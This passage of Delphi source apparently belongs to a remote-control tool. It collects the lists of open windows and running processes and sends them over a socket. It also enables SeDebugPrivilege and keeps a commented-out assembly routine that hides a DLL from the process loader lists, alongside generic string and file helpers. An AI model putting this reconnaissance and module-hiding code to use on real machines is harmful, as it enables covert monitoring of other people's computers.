WindowListStr := WindowListStr + '<item IsVisibleWindow="' + 'No';
WindowListStr := WindowListStr +
'" Index="' + IntToStr(WindowsNumber) +
'" WindowID="' + IntToStr(hWnd) +
'" title="' + titleStr +
'" classname="' + classnameStr +
'" ProcID="' + IntToStr(DWORD(ProcID)) +
//'" AppPath="' + AppPath +
'"/>';
Inc(WindowsNumber);
end
else
begin
SetEvent(FinishSearchWindowNotifyEvent);
Exit;
end;
end
else
Result := False;
end;
//发送窗口列表信息
procedure SendAllWindowList(const Socket : TSocket);
// Enumerate the top-level windows into the unit-global WindowListStr
// (filled by the EnumWindowsProc callback defined above this procedure,
// one <item .../> per window) and send the result over Socket through
// GetListAndSend, tagged WindowsListType.
//
// Socket: the connected socket the list is written to.
//
// NOTE(review): the WaitForSingleObject result is not examined, so if
// the 500 ms timeout elapses a partially built WindowListStr is sent.
// SetEvent(FinishSearchWindowNotifyEvent) is only visible on one branch
// of EnumWindowsProc, so presumably a complete enumeration relies on the
// timeout rather than the event — confirm the intended handshake.
begin
// clear the shared buffer first
WindowListStr := '';
WindowsNumber := 0;
// the callback appends to WindowListStr and bumps WindowsNumber
Windows.EnumWindows(@EnumWindowsProc, 0);
// wait (at most 500 ms) for the window search to finish
WaitForSingleObject(FinishSearchWindowNotifyEvent, 500);
// send it out
GetListAndSend(Socket, WindowListStr, False, WindowsListType);
end;
//得到进程列表,并发送
procedure GetProcessListAndSend(const Socket : TSocket);
// Walk a Toolhelp32 process snapshot and send one <item .../> per
// process (Index, ExeShortName, ProcessID, ExeFileName) over Socket
// through GetListAndSend, tagged ProcessListType.
//
// Socket: the connected socket the list is written to.
//
// NOTE(review): the snapshot handle is never compared with
// INVALID_HANDLE_VALUE; when CreateToolhelp32Snapshot fails,
// Process32First returns False and an empty list is sent, so the
// failure is invisible to the peer.
// NOTE(review): only '&' is rewritten to '?' in the two name fields;
// '<' or '"' inside an executable name would reach the attribute text
// unescaped, so the receiving parser has to tolerate that.
var
Found : Boolean; // state for the process enumeration loop
FSnapshotHandle : THANDLE;
LAppE : TProcessEntry32;
Summ: Word; // running item index; a Word wraps after 65535 entries
i : integer;
ExeShortName, ExeFileName, ProcessListStr : string;
begin
// CreateToolhelp32Snapshot takes a snapshot of all running processes
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
// Process32First requires dwSize to be set before the first call
LAppE.dwSize := Sizeof(LAppE);
// fetch the first process recorded in the snapshot
Found := Process32First(FSnapshotHandle, LAppE);
Summ := 0;
ProcessListStr := '';
while Found do
begin
// executable short name as recorded in the snapshot entry
ExeShortName := LAppE.szExeFile;
// full path of the process image; GetAppFromProcID is defined outside this excerpt
ExeFileName := GetAppFromProcID(LAppE.th32ProcessID);
// replace the one character that would break the list format
if ExeShortName <> '' then
for i := 1 to Length(ExeShortName) do
if (ExeShortName[i] = '&') then
ExeShortName[i] := '?';
if ExeFileName <> '' then
for i := 1 to Length(ExeFileName) do
if (ExeFileName[i] = '&') then
ExeFileName[i] := '?';
ProcessListStr := ProcessListStr +
'<item Index="' + IntToStr(Summ) +
'" ExeShortName="' + ExeShortName +
'" ProcessID="' + IntToStr(LAppE.th32ProcessID) +
'" ExeFileName="' + ExeFileName +
'"/>';
Found := Process32Next(FSnapshotHandle, LAppE);
Inc(Summ);
end;
// the snapshot handle is released even when the walk ended early
CloseHandle(FSnapshotHandle);
GetListAndSend(Socket, ProcessListStr, False, ProcessListType);
end;
{
function HideModuleFromPEB( proc hInstDLL ) : DWORD;
assume fs:nothing
mov esi,hInstDLL
xor eax,eax
mov eax,fs:[eax].TEB.Peb
mov eax,[eax].PEB.Ldr
lea eax,[eax].PEB_LDR_DATA.InLoadOrderModuleList
@@:
mov eax,[eax].LDR_MODULE.InLoadOrderModuleList.Flink
cmp esi,[eax].LDR_MODULE.BaseAddress
jnz @B
mov esi,[eax].LIST_ENTRY.Flink
mov ebx,[eax].LIST_ENTRY.Blink
mov [ebx].LIST_ENTRY.Flink,esi
mov esi,[eax].LIST_ENTRY.Blink
mov ebx,[eax].LIST_ENTRY.Flink
mov [ebx].LIST_ENTRY.Blink,esi
lea eax,[eax].LDR_MODULE.InMemoryOrderModuleList
mov esi,[eax].LIST_ENTRY.Flink
mov ebx,[eax].LIST_ENTRY.Blink
mov [ebx].LIST_ENTRY.Flink,esi
mov esi,[eax].LIST_ENTRY.Blink
mov ebx,[eax].LIST_ENTRY.Flink
mov [ebx].LIST_ENTRY.Blink,esi
ret
HideModuleFromPEB endp
}
(*----------------------------以下函数是共用函数-----------------------------*)
//检查文件是不是存在的
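function DirectoryExists(const Directory: string): boolean;
// True when Directory names an existing directory.
//
// Uses GetFileAttributes instead of FindFirstFile: FindFirstFile does
// not accept a bare drive root such as 'C:\', so the previous version
// always reported roots as missing, and it needed a find handle that
// had to be closed again. Wildcards are no longer expanded.
//
// Directory: path to test; an empty string yields False.
var
  Attrs: DWORD;
begin
  Attrs := GetFileAttributes(PChar(Directory));
  // GetFileAttributes signals failure with all bits set (DWORD(-1))
  Result := (Attrs <> DWORD(-1)) and
    ((Attrs and FILE_ATTRIBUTE_DIRECTORY) <> 0);
end;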
//获取文件夹
function ExtractFilePath(sFile: String): String; stdcall;
// Everything up to and including the last '\' in sFile. When there is
// no backslash at all, the whole string is returned unchanged.
var
  Cut: Integer;
begin
  // scan backwards for the last separator
  Cut := Length(sFile);
  while (Cut > 0) and (sFile[Cut] <> '\') do
    Dec(Cut);
  // no separator: keep the full input
  if Cut = 0 then
    Cut := Length(sFile);
  Result := Copy(sFile, 1, Cut);
end;
//获取文件名
function ExtractFileName(sFile: String): String; stdcall;
// The file name part of sFile with both the directory and the last
// extension removed: 'C:\x\a.tar.gz' -> 'a.tar'. A name without a '.'
// is returned whole; a name that is only an extension ('.cfg') yields ''.
var
  Cut: Integer;
  BaseName: String;
begin
  // drop everything through the last '\'
  Cut := Length(sFile);
  while (Cut > 0) and (sFile[Cut] <> '\') do
    Dec(Cut);
  BaseName := Copy(sFile, Cut + 1, Length(sFile));
  // drop the last '.' and what follows it
  Cut := Length(BaseName);
  while (Cut > 0) and (BaseName[Cut] <> '.') do
    Dec(Cut);
  if Cut = 0 then
    Cut := Length(BaseName) + 1;
  Result := Copy(BaseName, 1, Cut - 1);
end;
//inttostr function
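function IntToStr(IntValue : integer) : string;
// Decimal text of IntValue, e.g. -42 -> '-42'.
//
// The magnitude is taken through Int64 into a Cardinal so that
// Low(Integer) converts correctly: negating the Integer in place wraps
// for -2147483648 and produced a garbage digit in the old version.
//
// IntValue: value to convert.
// Returns: the decimal string, with a leading '-' for negative values.
const
  MAX_DIGITIS_INT = 10;
var
  Magnitude : Cardinal;
  Digits : array[0..MAX_DIGITIS_INT + 1] of Char; // 10 digits + optional '-'
  Count, k : integer;
begin
  if IntValue < 0 then
    Magnitude := Cardinal(-Int64(IntValue))
  else
    Magnitude := Cardinal(IntValue);
  // peel off digits least-significant first
  Count := 0;
  repeat
    Digits[Count] := Char(Byte(Magnitude mod 10) + Byte('0'));
    Inc(Count);
    Magnitude := Magnitude div 10;
  until Magnitude = 0;
  if IntValue < 0 then
  begin
    Digits[Count] := '-';
    Inc(Count);
  end;
  // emit the collected characters in reverse order
  SetLength(Result, Count);
  for k := 1 to Count do
    Result[k] := Digits[Count - k];
end;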
//字符串转int
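function StrToInt(ConvertStr : string) : integer;
// Parse a decimal integer with an optional leading '-'.
//
// Parsing stops at the first character that is not a digit, so '12ab'
// yields 12 and a non-numeric string yields 0. The old version folded
// every byte up to the terminator into the result and indexed
// ConvertStr[1] even when the string was empty.
//
// ConvertStr: text to parse.
// Returns: the parsed value (0 for an empty or non-numeric string).
//   Overflow is not detected; values outside Integer wrap silently.
var
  Pos, Len, Accum : integer;
  Negative : Boolean;
begin
  Len := Length(ConvertStr);
  Accum := 0;
  Pos := 1;
  Negative := (Len > 0) and (ConvertStr[1] = '-');
  if Negative then
    Pos := 2;
  while (Pos <= Len) and (ConvertStr[Pos] >= '0') and (ConvertStr[Pos] <= '9') do
  begin
    Accum := Accum * 10 + (Ord(ConvertStr[Pos]) - Ord('0'));
    Inc(Pos);
  end;
  if Negative then
    Result := -Accum
  else
    Result := Accum;
end;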
//转化为hex字符串
function IntToHex(dwValue, dwDigits: DWord): String; stdcall;
// Upper-case hexadecimal text of dwValue, exactly dwDigits characters
// wide (clamped to 8). Only the low dwDigits nibbles are returned, so a
// value wider than the requested width is truncated on the left;
// dwDigits = 0 yields ''.
const
  hex: array[0..$F] of char = ('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
var
  Full: String;
  Nibble: Integer;
begin
  if dwDigits > 8 then
    dwDigits := 8;
  // render all eight nibbles, most significant first
  SetLength(Full, 8);
  for Nibble := 0 to 7 do
    Full[8 - Nibble] := hex[(dwValue shr (4 * Nibble)) and $F];
  // keep the rightmost dwDigits characters
  Result := Copy(Full, 9 - dwDigits, dwDigits);
end;
//得到最小值
function Min(const A, B: Integer): Integer;
// The smaller of A and B.
begin
  Result := B;
  if A < B then
    Result := A;
end;
//释放类实例,并nil指针
procedure FreeAndNil(var Obj);
// Free the object referenced by Obj and set the reference to nil.
//
// Obj: an untyped reference to a TObject instance (or nil; Free on nil
//      is a no-op).
//
// The reference is cleared before Free is called, so the caller never
// holds a dangling pointer even if the destructor raises. Do not
// reorder these statements.
var
Temp: TObject;
begin
Temp := TObject(Obj);
Pointer(Obj) := nil;
Temp.Free;
end;
//转为小写
function LowerCase(sString: String): String; stdcall;
// ASCII-only lower-casing: the characters 'A'..'Z' are shifted by 32,
// every other character is copied through untouched.
var
  Idx, Len : Integer;
  Ch : Char;
begin
  Len := Length(sString);
  SetLength(Result, Len);
  for Idx := 1 to Len do
  begin
    Ch := sString[Idx];
    if (Ch >= 'A') and (Ch <= 'Z') then
      Ch := Chr(Ord(Ch) + 32);
    Result[Idx] := Ch;
  end;
end;
//转为大写
function UpperCase(sString: String): String; stdcall;
// ASCII-only upper-casing: the characters 'a'..'z' are shifted by 32,
// every other character is copied through untouched.
var
  Idx, Len : Integer;
  Ch : Char;
begin
  Len := Length(sString);
  SetLength(Result, Len);
  for Idx := 1 to Len do
  begin
    Ch := sString[Idx];
    if (Ch >= 'a') and (Ch <= 'z') then
      Ch := Chr(Ord(Ch) - 32);
    Result[Idx] := Ch;
  end;
end;
//得到调试权限
function EnableDebugPrivilege : Boolean;
// Enable SeDebugPrivilege on the current process token. Returns True
// only when AdjustTokenPrivileges left GetLastError at ERROR_SUCCESS.
//
// NOTE(review): the return values of OpenProcessToken and
// LookupPrivilegeValue are ignored and the empty except blocks swallow
// every exception, so when OpenProcessToken fails hToken is used
// uninitialised and still passed to CloseHandle. Token privilege
// adjustments are visible to Windows token-right auditing (event 4703
// on current Windows); nothing here changes that.
// Enable (bEnable) or disable the named privilege on hToken.
function EnablePrivilege(hToken : Cardinal; PrivName : string; bEnable : Boolean) : Boolean;
var
TP : TOKEN_PRIVILEGES;
Dummy : Cardinal;
begin
Result := False;
try
TP.PrivilegeCount := 1;
// resolve the privilege name to its LUID (return value unchecked)
LookupPrivilegeValue(nil, pchar(PrivName), TP.Privileges[0].Luid);
if bEnable then
TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
TP.Privileges[0].Attributes := 0;
windows.AdjustTokenPrivileges(hToken, False, TP, SizeOf(TP), nil, Dummy);
// ERROR_NOT_ALL_ASSIGNED here means the account does not hold the privilege
Result := GetLastError = ERROR_SUCCESS;
except
end;
end;
var
hToken : Cardinal;
begin
Result := False;
try
OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken);
Result := EnablePrivilege(hToken, 'SeDebugPrivilege', True);
CloseHandle(hToken);
except
end;
end;
//将类内函数转化为实例函数
{
使用此函数需要注意两点:
1、The return value should not be of type String, dynamic array, method or Variant pointer.
2、The method must be declared as stdcall.
不过还好,大部分的系统回调函数都要求是stdcall的,并且返回值一般都是boolean类型的。
}
function MakeProcInstance(M: TMethod): Pointer;
// Build a 15-byte x86 stub that lets the method M be used as a plain
// stdcall callback: the stub loads M.Data (the instance) into ECX,
// inserts it on the stack as the first argument beneath the saved
// return address, and jumps to M.Code. The caller owns the stub and
// must release it with FreeProcInstance.
//
// M: the method (Code + Data) to wrap.
//
// NOTE(review): the stub is written to ordinary GetMem heap memory; if
// the process runs with DEP enforced that memory is not executable and
// the first call into the stub faults — memory with execute permission
// would be required. The asm block also assumes EAX still holds Result
// after GetMem, an unstated register assumption — confirm against the
// compiler version in use. 32-bit x86 only (DWORD operands, ECX/EDX).
begin
// allocate memory
GetMem(Result, 15);
asm
// MOV ECX,
MOV BYTE PTR [EAX], $B9
MOV ECX, M.Data
MOV DWORD PTR [EAX+$1], ECX
// POP EDX
MOV BYTE PTR [EAX+$5], $5A
// PUSH ECX
MOV BYTE PTR [EAX+$6], $51
// PUSH EDX
MOV BYTE PTR [EAX+$7], $52
// MOV ECX,
MOV BYTE PTR [EAX+$8], $B9
MOV ECX, M.Code
MOV DWORD PTR [EAX+$9], ECX
// JMP ECX
MOV BYTE PTR [EAX+$D], $FF
MOV BYTE PTR [EAX+$E], $E1
end;
end;
//释放掉实例化占用的内存
procedure FreeProcInstance(ProcInstance: Pointer);
// Release a stub obtained from MakeProcInstance. The size passed to
// FreeMem must match the 15 bytes allocated there.
const
  StubSize = 15;
begin
  FreeMem(ProcInstance, StubSize);
end;
//检查文件是否存在
function FileAge(const FileName: string): Integer;
// DOS-packed last-write time of the file FileName (FAT date in the
// high word, FAT time in the low word, local time), or -1 when the name
// does not resolve to an existing regular file. Directories yield -1.
var
  Search: THandle;
  Info: TWin32FindData;
  LocalTime: TFileTime;
  DosDate, DosTime: Word;
begin
  Result := -1;
  Search := FindFirstFile(PChar(FileName), Info);
  if Search = INVALID_HANDLE_VALUE then
    Exit;
  // only the first match is needed; release the find handle at once
  Windows.FindClose(Search);
  if (Info.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) <> 0 then
    Exit;
  FileTimeToLocalFileTime(Info.ftLastWriteTime, LocalTime);
  if FileTimeToDosDateTime(LocalTime, DosDate, DosTime) then
    Result := (Integer(DosDate) shl 16) or Integer(DosTime);
end;
//检查文件是否存在
function FileExists(const FileName: string): Boolean;
// True when FileName is an existing regular file, i.e. FileAge reports
// a timestamp rather than -1. Directories are reported as absent.
var
  Stamp: Integer;
begin
  Stamp := FileAge(FileName);
  Result := Stamp <> -1;
end;
end.